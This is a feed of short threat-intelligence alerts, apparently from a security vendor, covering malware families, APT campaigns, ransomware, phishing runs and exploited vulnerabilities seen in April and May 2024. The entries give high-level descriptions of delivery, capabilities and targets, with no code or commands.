NiceCurl and TameCat custom backdoors leveraged by Damselfly APTALERTSAPTNiceCurl and TameCat are two custom backdoor variants recently leveraged in malicious campaigns attributed to the Damselfly APT (also known as APT42). These backdoors are reported to be delivered mostly by spear-phishing campaigns and used by the threat actors for the purpose of initial access to the targeted environments. While NiceCurl is a VBScript-based malware with capabilities to download and execute additional modules, TameCat backdoor is used to execute PowerShell and C# scripts as well as download additional arbitrary content.

3.5.24

TesseractStealer malware leverages OCR engine for information extractionALERTSVIRUSTesseractStealer is an infostealer recently distributed by variants of the ViperSoftX malware. This malware leverages Tesseract (an open source OCR engine) in an effort to extract text from user image files. The malware focuses on specific data related to credentials and cryptocurrency wallet information. Next to TesseractStealer, some of the recent ViperSoftX runs have also been observed to drop another payload from the QuasarRAT malware family.

3.5.24

A recent Darkgate malspam campaignALERTSCAMPAIGNThe infection chain for this campaign initiates from an email file with an HTML attachment. This HTML file uses a background image that resembles what looks like a blank Microsoft Document file, where instructions on how to fix the offline viewing of the file can be seen. This is an attempt to trick victims into pasting malicious PowerShell code into a Windows Terminal. Once the code is executed, an HTA file will be downloaded and will continue to execute, eventually downloading a follow-up ZIP file. Once extracted, it will launch an open-source automation engine called AutoIt to execute a malicious AutoIt script named script.a3x that will eventually load the Darkgate trojan.

3.5.24

Latest macOS Adload variant focuses on detection evasionALERTSVIRUSA recent report by SentinelOne outlines changes observed to a recent macOS malware Adload. The most recent variants of this malware family come with capabilities allowing it to evade the latest Apple XProtect signatures. Adload malware has been present in the macOS landscape for several years now, known to be distributed via drive-by-downloads and often used in attempts to hijack browser search results, inject ads into webpages or deliver various payloads to the victims.

3.5.24

Old dogs teaching new tricks to ZLoaderALERTSVIRUSZLoader, a modular trojan, has implemented anti-analysis capabilities that appear to be lifted from the ZeuS source code. This 'new' ability allows ZLoader to block installation on machines other than where the initial infection occurred, stopping further stages from deploying, in the hopes of hindering in depth analysis.

3.5.24

Goldoon botnetALERTSBOTNETAccording to a recent report from FortiGuard Labs, a new botnet variant dubbed Goldoon has been observed in the wild. This malware targets the exploitation of an old D-Link vulnerability from 2015 - CVE-2015-2051 for its propagation. Goldoon can establish persistence on the affected device and execute commands received from C2 servers. The attackers might use this malware variant to gain control over the infected devices, collect system information as well as perform various forms of distributed denial-of-service (DDoS) attacks.

3.5.24

BirdyClient malware leverages Microsoft Graph API for C&C communicationALERTSVIRUSAn increasing number of threats have begun to leverage the Microsoft Graph API, usually to facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services. The technique was most recently used in an attack against an organization in Ukraine, where a previously undocumented piece of malware called BirdyClient used the Graph API to leverage Microsoft OneDrive for C&C purposes.

3.5.24

DarkGate loader continues to be actively distributedALERTSVIRUSDarkGate loader malware has been a very actively distributed within the last year. Numerous email campaigns have leveraged various attack chains to deliver the DarkGate payload. Emails have been observed containing direct download links while others may use attachments (PDF, ZIP, etc) to initiate the delivery.

3.5.24

Dwphon mobile malwareALERTSVIRUSDwphon is a recently identified malware variant targeting the Android platform. The malware has the functionality to collect information about the infected device, the info about applications installed on the device as well as some confidential personal information. Dwphon might consist of several distinct modules, each with its own functions and C2 instructions.  

3.5.24

SpyNote using Central Bank of Kazakhstan as a lureALERTSVIRUSNo countries or financial institutions are exempt from having their brands abused to lure mobile users into installing Android malware—a trend that continues to grow. Symantec has recently observed an actor actively targeting users in Kazakhstan with the SpyNote RAT. 

3.5.24

GuLoader campaign targeting industries in Russian-speaking countriesALERTSCAMPAIGNAn actor has been observed running two email campaigns with different social engineering tactics that lead to Guloader. Both campaigns target industries in Russian-speaking countries such as Russia, Belarus, Kyrgyzstan, and Kazakhstan.
30.4.24New DragonForce Ransomware variantALERTSRANSOMA new variant of ransomware called DragonForce has been observed using a leaked ransomware builder from the LockBit ransomware group.DragonForce Ransomware targets victim(s) with the intent of extortion. The threat actor typically employs a double extortion tactic by locking the victim(s) out of their infected machines and exfiltrating data before encryption. If the victim(s) fail to meet the demands imposed, the threat actor will release the data to others via the dark web.
30.4.24Security vendor applications impersonated in recent malware campaignALERTSVIRUSImpersonating legitimate applications is a common tactic observed in attack campaigns. Among the simpler methods of impersonation is to convince a victim to execute content by leveraging a legitimate filename. In a recent report published by Sophos, they have identified activity in which attackers are modifying legitimate binaries of security vendors to launch newly embedded malicious payloads. It should be noted that modifying such files will break digital signatures and conversely de-legitimize the applications.
30.4.24Ziraat Stealer disguised as data recovery toolALERTSVIRUSThe Ziraat Stealer, a .NET infostealer, has been discovered masquerading as a Data Recovery tool. This malware is capable of extracting passwords and credentials from browsers, social media platforms, and various email applications. Moreover, it can conduct screenshot and keylogging activities. Classified as a specialized Remote Access Trojan (RAT), this malicious software has the ability to extract sensitive information from compromised systems.
30.4.24Rising trend of FakeBat malware campaigns, exploiting MSIX installers and malvertisingALERTSVIRUSMany campaigns involving the FakeBat malware have been reported recently, showing an increasing trend. FakeBat utilizes multiple delivery tactics, with malvertising being the primary strategy. This involves exploiting online advertising platforms, including Google Ads, to spread the malware. What makes FakeBat unique is that the threat actor uses MSIX installers packaged with heavily obfuscated PowerShell code.
27.4.24Multiple vulnerabilities in OpenMetadataALERTSVULNEREBILITYOpenMetadata is an open source metadata platform that can be used for data discovery, cataloging and collaboration. According to a recent report, threat actors have been exploiting critical vulnerabilities including authentication bypass and SpEL Expression Injections in OpenMetadata in efforts leading to deployment of cryptomining software. The recently disclosed OpenMetadata vulnerabilities include CVE-2024-28253, CVE-2024-28254, CVE-2024-28255, CVE-2024-28847, and CVE-2024-28848 and affect product versions prior to 1.3.1. If successfully exploited, the discussed vulnerabilities might allow unauthenticated remote attackers to achieve remote code execution (RCE) on affected instances.
27.4.24KageNoHitobito ransomwareALERTSRANSOMKageNoHitobito ransomware came on the scene in March 2024. This is a no frills ransomware with basic old school functionality; file encryption (only on the local drive), drops ransom notes, and requires interaction with the attack group via Tor. There are no indications of any data theft for extortion functions. Data shows that this ransomware has been seen in multiple countries across the world.
27.4.24Brokewell mobile malwareALERTSVIRUSBrokewell is a new mobile malware variant discovered in the wild. According to a recent report, the malware is delivered to Android users via a fake Google Chrome browser update package. The malware features extensive infostealing functionalities including hardware information collection, credential exfiltration, call logs retrieval, audio capture, screen streaming, capture of taps, swipes and text inputs as well other various remote access and device takeover capabilities.
27.4.24Amadey malware family remains an active threat in the landscapeALERTSVIRUSAmadey is an infostealer variant enriched with additional functionalities allowing it to download and execute malicious payloads such as ransomware. While this malware family has been known for a relatively long time, new Amadey samples are found in the wild almost every day. Modular architecture combined with both infostealing and payload loading capabilities allow for this malware to be used in miscellaneous of campaigns by different threat groups. Amadey is known to be distributed via a wide variety of ways including malicious attachments, drive-by-downloads masqueraded as cracked software, malvertising or exploit kits.
25.4.24SSLoad and Cobalt Strike leveraged in compromised "Contact Form" campaignALERTSAPTA new loader has emerged called SSLoad, distinct from SLoad. Reports reveal a campaign where attackers were observed abusing and sending malicious links via contact forms. Clicking these links will download and install the SSLoad malware, then this DLL-based loader will deploy further backdoors and payloads, including a Cobalt Strike beacon to establish connection to the attacker's C2 servers to exfiltrate system and user information.
25.4.24SpyNote campaign using Vietnam's National Public Service as baitALERTSAPTSpyNote remote access trojan and its variants are proliferating globally, with groups and individuals employing various social engineering tactics to target mobile users. In a recent campaign, Symantec observed the threat (DỊCH VỤ CÔNG.apk) masquerading as an official app from Vietnam's National Public Service web platform, which offers extensive online public services for both citizens and businesses.
25.4.24APT43 exploits Dropbox in TutorialRAT distribution campaignALERTSAPTThe APT43 group has been observed distributing TutorialRAT by actively exploiting Dropbox cloud storage as a base for their attacks to evade threat monitoring. This campaign appears to be an extension of APT43's BabyShark threat campaign and employs typical spear-phishing techniques, including the use of shortcut (LNK) files. TutorialRAT is a C#-based remote control program that functions as an infostealer, collecting and exfiltrating device and users' personal information .
25.4.24CryptBot among the infostealer variants distributed in latest CoralRaider campaignALERTSVIRUSAccording to a recent report, three distinct infostealers variants Cryptbot, LummaC2 and Rhadamanthys have been distributed in a newly discovered campaign attributed to the threat actor known as CoralRaider. The threat actors have been leveraging Content Delivery Network (CDN) cache as a malware delivery mechanism. The new variant of CryptBot malware has the functionality to steal a wide variety of data from the compromised machines. It targets data exfiltration from web browsers, cryptocurrency wallets, authenticator apps and password managers.
25.4.24Seedworm exploits Atera Agent in a spear-phishing CampaignALERTSCAMPAIGNSeedworm (also known as MuddyWater), is actively exploiting the legitimate remote monitoring and management (RMM) tool Atera Agent in its spear-phishing campaign. The actor leverages Atera's 30-day free trial offers to create agents registered with compromised email accounts, enabling remote access to targeted systems without establishing their own command-and-control (C2) infrastructure. Atera offers extensive remote control capabilities via its web UI, including file upload/download, interactive shell access, and AI-powered command assistance. The threat actor utilizes free file hosting platforms to host their RMM installers, distributing them via spear-phishing emails.
25.4.24Fake Job App Steals SMS Messages From Oil Industry Job SeekersALERTSMobilSymantec has recently observed a malicious actor targeting mobile users who are looking for jobs in the oil industry. They have created a fake application ([company name] Jobs.apk) that has the appearance of being from a significant player in the oil industry of Bahrain and the Middle East. Users who are successfully lured into installing the app are asked to input their phone numbers into a form. Unbeknownst to them, the malicious actors will actually monitor and steal all their SMS messages.
25.4.24More Fake MetaMask Android Apps Circulating, Targeting Users' WalletsALERTSVIRUSMore fake MetaMask Android applications have been observed targeting mobile users' wallet via phishing tactics, all of which are being hosted on malicious domains mimicking MetaMask and leveraging typosquatting techniques. It's most likely that these apps are being spread via malicious SMS. 
25.4.24GooseEgg, a post-explotation malwareALERTSVIRUSResearchers at Microsoft have reported on ongoing activities of the Russian-based threat actor Forest Blizzard identified by Symantec as Swallowtail (aka STRONTIUM) utilizing a custom tool dubbed GooseEgg. This activity has been taking place since at least 2020 and possibly as early as 2019. The tool exploits a vulnerability in the Windows Print Spooler service (CVE-2022-38028) to gain SYSTEM-level privileges and steal credentials from compromised networks. The recently observed campaign targets government, non-governmental, education, and transportation sector organizations primarily in Ukraine, Western Europe, and North America.
23.4.24Kapeka backdoorALERTSVIRUSKapeka is a recently identified backdoor variant leveraged in malicious campaigns targeted at various entities from Eastern Europe since at least 2022. It is believed that this backdoor has been distributed by the threat group known as Sandworm. Kapeka backdoor is coded in C++ and contains capabilities for victim's machine fingerprinting, shell command execution, read/write file operations or launch of arbitrary payloads, among others. Kapeka has also functionalities to upgrade the backdoor binaries or to completely remove itself from the infected endpoint.
23.4.24Sharpil RAT malware - possible precursor to Sharp StealerALERTSVIRUSSharpil is a new Remote Access Trojan (RAT) discovered in the threat landscape. This C#-based malware features basic infostealing functionality including system info collection and data gathering from various web browsers. Once on the infected machine Sharpil initiates connection to the attackers via a Telegram bot. Sharpil exhibits some code similarities with another recently identified malware variant called Sharp Stealer. This variant has been reported as being advertised for sale on Telegram, and it possesses some enhanced capabilities when compared to Sharpil RAT.
22.4.24Core Werewolf APT group targets Russian defense organizations in espionage campaignALERTSAPTEspionage activity of the Core Werewolf APT group targeting Russian defense organizations was observed around mid-April. The attack utilized a malicious document as bait, purportedly meant for the presentation of state awards to special forces soldiers. However, the document is actually a 7zSFX archive containing a legitimate remote access tool, UltraVNC. Upon extraction, the malware creates copies of a decoy document and the UltraVNC executable, schedules tasks to run the executable, and establishes a connection to a designated server.
22.4.24Megazord RansomwareALERTSRANSOMMegazord ransomware is a Rust-based malware that targets healthcare, education, and government entities. The initial attack vector includes spear-phishing emails as well as exploiting vulnerable services. Tools such as RDP and advanced IP scanners are used for lateral movement. Once compromised, Megazord terminates multiple processes and services, and encrypts local volumes and files. The encrypted files are appended with the “POWERRANGES” extension, and a ransom note, "powerranges.txt" is dropped in each folder containing encrypted files. Victims are instructed to contact the threat actor via the TOX messenger with reference to a unique Telegram channel link provided in the ransom note. Megazord shares multiple code similarities with Akira and is believed to be related to the Akira ransomware.
22.4.24OfflRouter observed infecting Ukrainian DOC filesALERTSVIRUSThreat researchers have recently discovered OfflRouter infections in various DOC files observed in the wild. These documents contain VBA code that, once opened, downloads an executable file which begins to look for other DOC files on the machine to infect as well as search for additional plugins on removable drives.
20.4.24Coreid (aka Fin7) uses backdoor against US Automaker victimsALERTSAPTA recent report provided details of activity by the Coreid (aka Fin7) threat group in which victims in the US automaker industry were targeted. According to the report, the campaign leveraged spearphishing emails against selected targets by socially engineering content related to free online scanning tools. The victim would be coerced into following a link to a typosquatted domain related to a legitimate online scanner.
20.4.24APT Group exploits Web3 gaming hype in campaign for cryptocurrency earningsALERTSAPTA campaign centered around imitating web3 gaming projects has been observed, likely operated by a Russian-language APT group aiming for potential cryptocurrency earnings by leveraging the allure of blockchain-based gaming. Users are enticed to visit the main webpages of these projects to download the software. Once installed, the software further infects devices with infostealer malware. Depending on the operating system, the malware variants include Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro.
20.4.24Akira ransomware remains an active threat on the landscapeALERTSRANSOMSymantec Security Response is aware of the recent joint alert from CISA, the FBI, Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL) regarding a number of targeted activities observed for the Akira ransomware. Akira is a ransomware family seen on the threat landscape since at least 2023.
20.4.24XAgent spyware targeting iOS devicesALERTSVIRUSAn XAgent spyware targeting iOS devices has been identified, linked to the Swallowtail group (APT28). Primarily targeting political and government entities in Western Europe, XAgent possesses capabilities for remote control and data exfiltration. It can gather information on users' contacts, messages, device details, installed applications, screenshots, and call records.
19.4.24Malware campaign distributing MadMxShell backdoor via masquerade websitesALERTSCAMPAIGNA new backdoor called MadMxShell has surfaced as part of a malware campaign. The threat actors responsible for the campaign are hosting masquerade websites that impersonate legitimate IP scanner software sites. Employing tactics such as typosquatting and SEO poisoning, they attract users through Google Ads. The backdoor utilizes DNS MX queries for command and control (C2) communication, aiming to evade memory forensics security solutions. The malware provides attackers with unauthorized access to compromised systems, allowing them to execute commands, exfiltrate data, and carry out other malicious activities.
19.4.24CR4T malware implant distributed in the DuneQuixote campaignALERTSVIRUSMalicious campaign dubbed DuneQuixote has been reported to distribute new variants of the CR4T malware implant. The campaign targets various organizations and entities in the Middle East. CR4T malware comes in two different strains, one written in C/C++ and the other one in the Golang programming language. The malware functionality focuses on granting the attackers with access to the infected endpoints, enabling remote command execution and arbitrary file upload/download capabilities.
19.4.24Mamont Android banking trojanALERTSVIRUSMamont is a recently identified banking trojan for Android. The malware has been distributed disguised as a Google Chrome installer package. Mamont has the functionality to collect information about the infected device. It can exfiltrate selected messages and intercept new messages, sending them back to attackers' controlled Telegram channel. The malware has the capability to examine the content of the messages as it is focused on those related to any financial or monetary transactions.
18.4.24Google Firebase and Clearbit abused in Phishing campaignsALERTSCAMPAIGNPhishing actors employ a plethora of tactics to make their phishing attempts more persuasive, ranging from hosting services to social engineering. Among host services, abusing Google Firebase has been prevalent due to its ease of use, free hosting, scalability, and domain customization features. These attributes make it an appealing platform for phishing actors seeking to host and distribute fraudulent content with minimal effort and cost.
18.4.24TP-Link Archer AX21 CVE-2023-1389 still being exploited by botnetsALERTSVULNEREBILITYLast year an unauthenticated command injection vulnerability, CVE-2023-1389, was disclosed for the web management interface of the TP-Link Archer AX21 (AX1800) router. Despite this vulnerability being reported and remediated, numerous campaigns still exploit it. Recent attacks have been observed utilizing various botnets including Moobot, Miroi, AGoent, and Gafgyt. As botnets are known to target IoT vulnerabilities users should install the latest updates and follow manufacturer remediation steps. 
17.4.24CVE-2024-1852 - WordPress WP-Members Membership Plugin vulnerabilityALERTSVULNEREBILITYCVE-2024-1852 is a high severity cross-site scripting (XSS) vulnerability affecting WordPress WP-Members Membership Plugin. Successful exploitation of this vulnerability could allow unauthenticated attackers to inject arbitrary web scripts into vulnerable pages. If executed in the context of an administrator, the exploitation of this flaw could additionally lead to redirection of the site visitors to malicious URLs or further compromise. The vulnerability has been addressed in version 3.4.9.3 of the plugin.
17.4.24SoumniBot - Android banking malwareALERTSVIRUSSoumniBot is a new banking malware variant for Android. This malware has been reported to target mobile users from Korea. SoumniBot leverages several techniques to evade detection such as invalid compression method value, invalid manifest size or long XML namespace names. Functionality-wise this android malware can collect information about the infected device, contact data, SMS/MMS messages, and exfiltrate digital certificates issued by Korean banks that are stored on the device.
17.4.24Rincrypt RansomwareALERTSRANSOMRincrypt is one more run-of-the-mill ransomware variant recently observed on the threat landscape. When executed, it targets files with the specific extensions according to a pre-defined list. The malware appends the encrypted files with “.rincrypt” extension. Upon completed encryption process a ransom note file called "READ THIS.txt" is dropped onto the desktop of the infected machine. It contains an email address for the victims to contact for further instructions.
17.4.24Tax-Themed phishing campaign deploys XWorm RATALERTSVIRUSAn email phishing campaign has been reported deploying the Remote Access Trojan (RAT) XWorm. The attack begins with an HTML tax document attachment. Upon opening, it triggers the download of a JavaScript file which then executes a PowerShell script. This script is equipped with features to terminate running processes, manage decoy PDF files, disable User Account Control (UAC), and ultimately deliver the XWorm payload.
17.4.24Risen RansomwareALERTSRANSOMA ransomware actor known as "Risen" has been detected in the wild. According to their ransom note ($Risen_Note.txt and $risen_guide.hta), the threat actors appear to employ double-extortion tactics by threatening to sell or leak stolen information if the ransom payment is not made. Encrypted files will have an extension added to them, following this format: [actor's email address, TELEGRAM:actor's ID].random ID. Victims are provided with two email addresses, a Telegram ID, and a blog URL (hosted on the Tor network) as means of contact.
16.4.24SteganoAmor campaign attributed to TA558 threat groupALERTSGROUPA new malicious campaign dubbed as SteganoAmor has been attributed to the TA558 threat actor. The attackers have been leveraging steganography techniques by concealing malicious code inside image files. TA558 is a threat group know to target tourism and hospitality sectors with extensive focus on targets located in Latin America. In their attacks the group continues to leverage an old Microsoft Office Equation Editor vulnerability from 2017 - CVE-2017-11882. The observed delivered payloads might vary and include malware from Remcos, Agent Tesla, Formbook, Guloader, Lokibot, Xworm and several other families.
16.4.24L00KUPRU RansomwareALERTSRANSOML00KUPRU is a new Xorist ransomware variant recently discovered in the wild. The malware encrypts user files and adds the .L00KUPRU extension to them.The attackers drop a ransom noted as a text file called "HOW TO DECRYPT FILES.txt" and demand payment in Bitcoin cryptocurrency. Additionally, the ransom note is displayed in a pop-up window on the desktop providing the victims with contact details of the attackers as well as BTC wallet address for payments.
16.4.24SolarMarker malware campaign adapts with PyInstaller for obfuscationALERTSVIRUSA SolarMarker malware campaign has been observed utilizing PyInstaller to obfuscate first-stage PowerShell scripts instead of Inno Setup and PS2EXE, showcasing the adaptability of threat actors in evading detection mechanisms targeting SolarMarker. SolarMarker is typically spread through attacks involving Search Engine Optimization Poisoning (SEO-Poisoning). In this observed campaign, users were tempted to download a disguised PDF document from a website impersonating a reputed South Californian Medical University.
16.4.24Hive0051c malware campaign distributing GammaLoad in UkraineALERTSVIRUSHive0051c has been observed conducting a malware campaign distributing the GammaLoad malware in Ukraine. The attack vector employed phishing emails containing Ukrainian-language lure documents targeting military and government entities. The GammaLoad backdoor presents the risk of various follow-on payloads, facilitated by independent C2 fallback channels. Hive0051c utilized synchronized DNS fluxing across multiple channels to rotate infrastructure and maintained several active C2 clusters.
16.4.24FatalRAT Distributed Through Fake Cryptocurrency App WebsiteALERTSVIRUSA new malicious campaign has been identified where the attackers attempt to distribute FatalRAT malware via a webpage masqueraded as a legitimate cryptocurrency application download website specifically designed for Chinese users. Once the RAT payload is installed, it can steal personal information from victims and perform keylogging activities.
16.4.24Fake Anti Radar App SpyNote RAT Targets French DriversALERTSVIRUSSpeed cameras are quite prevalent in France, and their numbers have increased significantly over the years as part of road safety measures. They are deployed in various locations, including highways, urban areas, and rural roads, to monitor and enforce speed limits. These cameras are often placed strategically in areas prone to speeding or high accident rates, such as near schools, construction zones, and dangerous curves.
16.4.24XploitSPY Android malwareALERTSVIRUSAn active malicious campaign dubbed "eXotic Visit" has been recently spreading a customized variant of the XploitSPY Android malware. The campaign, which reportedly started way back in 2021, has been delivering malicious apps hosted on either dedicated websites or the Google Play store. Most recent variants of this malware incorporate code updates regarding obfuscation, emulator detection and use of native libraries to hide attacker information, among others. XploitSPY has the functionality to extract call logs, contacts and text messages from the infected device. It can also take pictures, record audio or send SMS messages, etc.
13.4.24Signed backdoor found in screen mirroring softwareALERTSVIRUSA recent report identified a signed backdoor present in LaiXi Android screen mirroring software. According to the report, attackers abused the Microsoft Windows Hardware Compatibility Program to get the malware signed. The malware contains an embedded freeware proxy server, likely intended to watch and potentially manipulate network traffic.
12.4.24LightSpy malware implantALERTSVIRUSLightSpy is a modular surveillance tool with variants supporting both Android and iOS platforms. This malware implant has functionality to exfiltrate private user information, GPS location data, SMS messages, messenger apps data, phone call history and others. LightSpy has also capabilities allowing it to comprehensively track browser history on the infected device, remotely execute shell commands and record voice over IP (VOIP) call sessions.
12.4.24Rhadamanthys malware deployments attributed to TA547ALERTSVIRUSA new Rhadamanthys infostealer deployment campaign attributed to the TA547 threat actor has been discovered in the wild. The campaign targets a wide range of industries in Germany. In their attacks, the attackers leverage .zip archives containing malicious .lnk files that once executed trigger PowerShell scripts leading to Rhadamanthys infection on the compromised endpoint. The deployed malware payload has various capabilities including collection and exfiltration of confidential user data such as credentials, cookies etc.
11.4.24Pupy RAT continues to be used in attacks against Linux systemsALERTSVIRUSPupy RAT continues to be leveraged in attacks conducted by miscellaneous threat operators. The malware has various functionalities including upload/download of files, remote command execution, information theft, keylogging and screenshot capture among others. While Pupy RAT is known to target both Windows and Linux systems, recently reported campaigns have seen usage of the Linux variant of this malware against targets in Asia.
11.4.24Metasploit Meterpreter observed in attacks targeting vulnerable Redis serversALERTSHACKINGMeterpreter is an advanced Metasploit attack payload leveraged in penetration testing that uses in-memory DLL injection stagers. The tool has been known to be exploited by various threat actors for a long while now. In a recently reported campaign, Meterpreter has been observed being deployed to vulnerable or misconfigured Redis servers. The attackers have also been using a privilege escalation tool called PrintSpoofer. Meterpreter deployment to vulnerable servers is an initial attack step that might lead to deployment of further arbitrary payloads such as cryptominers or ransomware.
11.4.24Nitrogen malware delivery campaignALERTSCAMPAIGNA new malicious campaign spreading the Nitrogen malware has been observed in the wild. The attack leverages malvertising techniques via Google Ads and the malware binaries are masqueraded as PuTTY or FileZilla software installers. Nitrogen uses DLL sideloading to infect the targeted system. Once deployed this malware is generally used to gain initial access allowing network compromise and additional arbitrary payload deployments.
9.4.24SpyNote mobile malware spread under the disguise of INPS Mobile applicationALERTSVIRUSA recent campaign targeted at mobile users in Italy has been distributing SpyNote malware under the disguise of the INPS Mobile application. INPS (National Institute for Social Security) is the main social security organisation in Italy and the INPS Mobile app gives INPS users access to various consultation and documentation services. The malicious app disguised as INPS mobile is distributed via a phishing page that resembles the official INPS website. The SpyNote malware payload has various capabilities including keylogging, SMS theft, screenshot grabbing, call recording or installation of additional arbitrary payloads.
9.4.24Nova Stealer among the malware variants distributed via Facebook ads advertising fake AI services ALERTSVIRUSA new infostealer distribution campaign has been reported in the wild with attackers leveraging compromised Facebook accounts to advertise fake AI services impersonating well-known brands such as MidJourney, SORA AI, Evoto, ChatGPT-5 and DALL-E 3. The advertisements lead victims to download malicious software disguised as desktop versions of the mentioned AI programs. Nova Stealer, Rilide Stealer V4, Vidar and IceRAT were among the infostealing payloads distributed in this campaign, which have been known to target users from various European countries.
8.4.24CVE-2023-7102, New Zero-Day vulnerability in Barracuda's ESG Appliance exploitedALERTSVULNEREBILITYA Chinese threat actor, UNC4841, has been reported exploiting a new zero-day vulnerability identified as CVE-2023-7102 in Barracuda Email Security Gateway (ESG) appliances. The threat actor utilized an Arbitrary Code Execution (ACE) vulnerability within a third-party Perl module called 'Spreadsheet ParseExcel' to deploy a specially crafted Excel email attachment targeting a limited number of ESG devices. Barracuda has observed new variants of SEASPY and SALTWATER malware being deployed on these ESG devices.
8.4.24New phishing run spoofs International Card Services (ICS)ALERTSPHISHING
Symantec has observed a new wave of phish runs spoofing International Card Services BV to steal credentials. In this run, threat actors have not hyperlinked the phishing URL but included it in plain text along with the email content. As the call to action in this phishing run, the email recipients are asked to to validate their email address. Interestingly for this supposed email validation process, the victims are required to copy and paste the actual phishing URL in the browser or type manually. The victims are served with credential harvesting webpages once the phishing URL opens in web browser.
8.4.24TISAK RansomwareALERTSRANSOMTISAK is a new ransomware variant observed in the wild. The malware appears to be a strain of the Proxima/BlackShadow ransomware family. It encrypts user data and appends .Tisak extension to the files. Upon completed encryption process a ransom note text file called Tisak_Help.txt is dropped within the encrypted locations on the infected machine. The malware has the functionality to stop various system processes and services as well as delete volume shadow copies. The threat actors behind this ransomware variant threaten the victims with data publication if the requested ransom demands are not met.
8.4.24Spoofed Adobe Creative Cloud email notifications appear in phish runsALERTSPHISHINGAdobe Creative Cloud provides a collection of applications for graphic design, video editing, web development, photography and more. Lately, Symantec has observed phishing runs that impersonate Adobe Creative Cloud and entice users to open fake notifications emails. The email body content is kept short and mentions a pending document stored in the cloud. These phish emails make an attempt to lure users to open and click on phish URLs. Upon clicking on the phish URLs presented in the email content, the victims are served with credential harvesting webpages.
8.4.24CVE-2023-41266 A path traversal vulnerability in Qlik Sense Enterprise under active exploitationALERTSVULNEREBILITYCVE-2023-41266 is a path traversal vulnerability affecting Qlik Sense Enterprise. If successfully exploited, this vulnerability allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. Symantec's network protection technology, Intrusion Prevention System (IPS) has picked up scans based on threat landscape monitoring, which indicate a recent uptick in exploitation of this vulnerability. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.
8.4.24Xamalicious Android malwareALERTSVIRUSXamalicious is a backdoor malware targeting the Android platform. The malware is built using Xamarin framework which is an open source platform for creating apps with .NET and C#. The malware has been previously distributed by various apps hosted on Google Play and some other 3rd party platforms. Xamalicious has the functionality to collect information about the infected device including hardware info, list of installed applications, geolocation info and network provider data, among others. Second stage payload might allow the attackers to take full control of the infected device and to perform additional fraudulent tasks.
8.4.24Binance Turkey Users Lured with MASAK Audit ScareALERTSCRIMEMore Binance smishing is being observed around the world, and in a recent example, Symantec has observed an actor targeting Turkish Binance users. The social engineering tactic in the messages is different from other, more generic ones. Here they bait users with account issues (preventing them from buying, selling, and transferring crypto) related to an audit conducted by the Financial Crimes Investigation Board (MASAK) – a regulatory authority in Turkey responsible for combating money laundering and terrorism financing. 
8.4.24Continuous activities of UAC-0099 threat group against UkraineALERTSGROUP"UAC-0099" is a threat group known to be targeting Ukraine since at least mid-2022. In some of the recent campaigns the attackers have been leveraging self extracting RAR .SFX archives, .LNK files masqueraded as WordPad documents as well as PowerShell scripts and a LoanPage VBS malware payload. UAC-0099 has also been observed to leverage exploitation of a known WinRAR CVE-2023-38831 vulnerability within the infection chain of their attacks.
8.4.24Bandook malware - an older threat remains active in the wildALERTSVIRUS
Bandook is a remote access trojan discovered way back in 2007. While it is quite an old malware family, new variants of Bandook reemerge in the wild with new distribution campaigns to this day. In one recent such run, Bandook has been spread with help of malicious PDF files leading to download of password-protected 7z archives that once extracted will deliver the Bandook payload. Upon infection the malware will execute commands received from the attacker-controlled C2 servers. The payload has also more capabilities allowing it to download additional arbitrary modules and executables.
8.4.24Malicious SMS Targets BDO Unibank usersALERTSVIRUSBanco De Oro (BDO) Unibank is the largest bank in the Philippines and among the top 20 banks in Southeast Asia. Over the past few weeks, Symantec has observed recurrent malicious SMS in which actors are attempting to lure the bank's mobile users into providing sensitive information that will eventually lead to financial theft. This campaign, while it mostly affects consumers, has also been observed targeting corporate users.
8.4.24No Christmas Break for Agent Tesla: Riyad Bank Impersonated in a Malspam CampaignALERTSVIRUSUsually over Christmas there is somewhat less malware activity, but that does not mean there isn't any. Attacks from all fronts (e.g., email, drive downloads, vulnerabilities, etc.) keep on going. In a recent example, an Agent Tesla malspam campaign caught Symantec's attention, with the actor impersonating Riyad Bank – a major financial institution in Saudi Arabia and one of the largest banks in the country by assets.
8.4.24Truist Bank users targeted with new phishing emailsALERTSPHISHINGTruist Bank is one of the top U.S. commercial banks headquartered in Charlotte, North Carolina. Recently, Symantec has observed a new wave of phish runs spoofing Truist Bank services with fake account notifications. The email content mentions about a "temporary hold" placed on your account that can be lifted after a proper verification is completed. It entices the user to click on the "Verify now" phish URL ready to steal credentials.
8.4.24MetaStealer distributed via malvertisingALERTSVIRUSMetaStealer is an infostealer variant discovered back in 2022. It is known to be delivered via malspam campaigns as well as bundled with pirated software. Recently the malware has been also seen being delivered via means of malvertising. Upon clicking on the ads, the victim gets redirected to malware landing pages masqueraded as download portals for AnyDesk or Notepad++ software. MetaStealer has the functionalities to collect various information from local browsers, steal credentials, cryptowallets, extract data from miscellaneous 3rd party applications and more.
8.4.24New variant of Chameleon Android malware allows for biometric authentication bypassALERTSVIRUSChameleon is an Android banking malware that first emerged at the beginning of 2023. The malware has been used in earlier campaigns targeting Android users in Australia and in Poland and has been distributed under the disguise of banking or cryptocurrrency apps. Chameleon's capabilities include keylogging, SMS harvesting, credential theft and cookie stealing, among others. The most recently discovered variant of this malware allows the attackers to bypass the biometric authentication on the infected device, forcing it to fallback to standard authentication means such as PIN entry and unlock the device.
8.4.24Operation HamsaUpdateALERTSOPERATIONOperation HamsaUpdate is a recently identified campaign targeting Israeli customers using F5’s network devices. The attackers have been reported to leverage wiper malware targeting Windows servers (variant called Hatef) as well as Linux platform (variant called Hamsa).
8.4.24Fictitious OnlyFans premium mobile app revealed as SpyNoteALERTSVIRUSOnlyFans' popularity worldwide has grown exponentially over the past few years. Positioned as a social media service, it has become a lucrative means of livelihood for many individuals. Yet, the intriguing dichotomy lies in its content, which ventures into the NSFW (Not Safe For Work) territory. Many users, while capitalizing on the platform's income potential, inadvertently tread a fine line that might lead them onto Santa's naughty list.
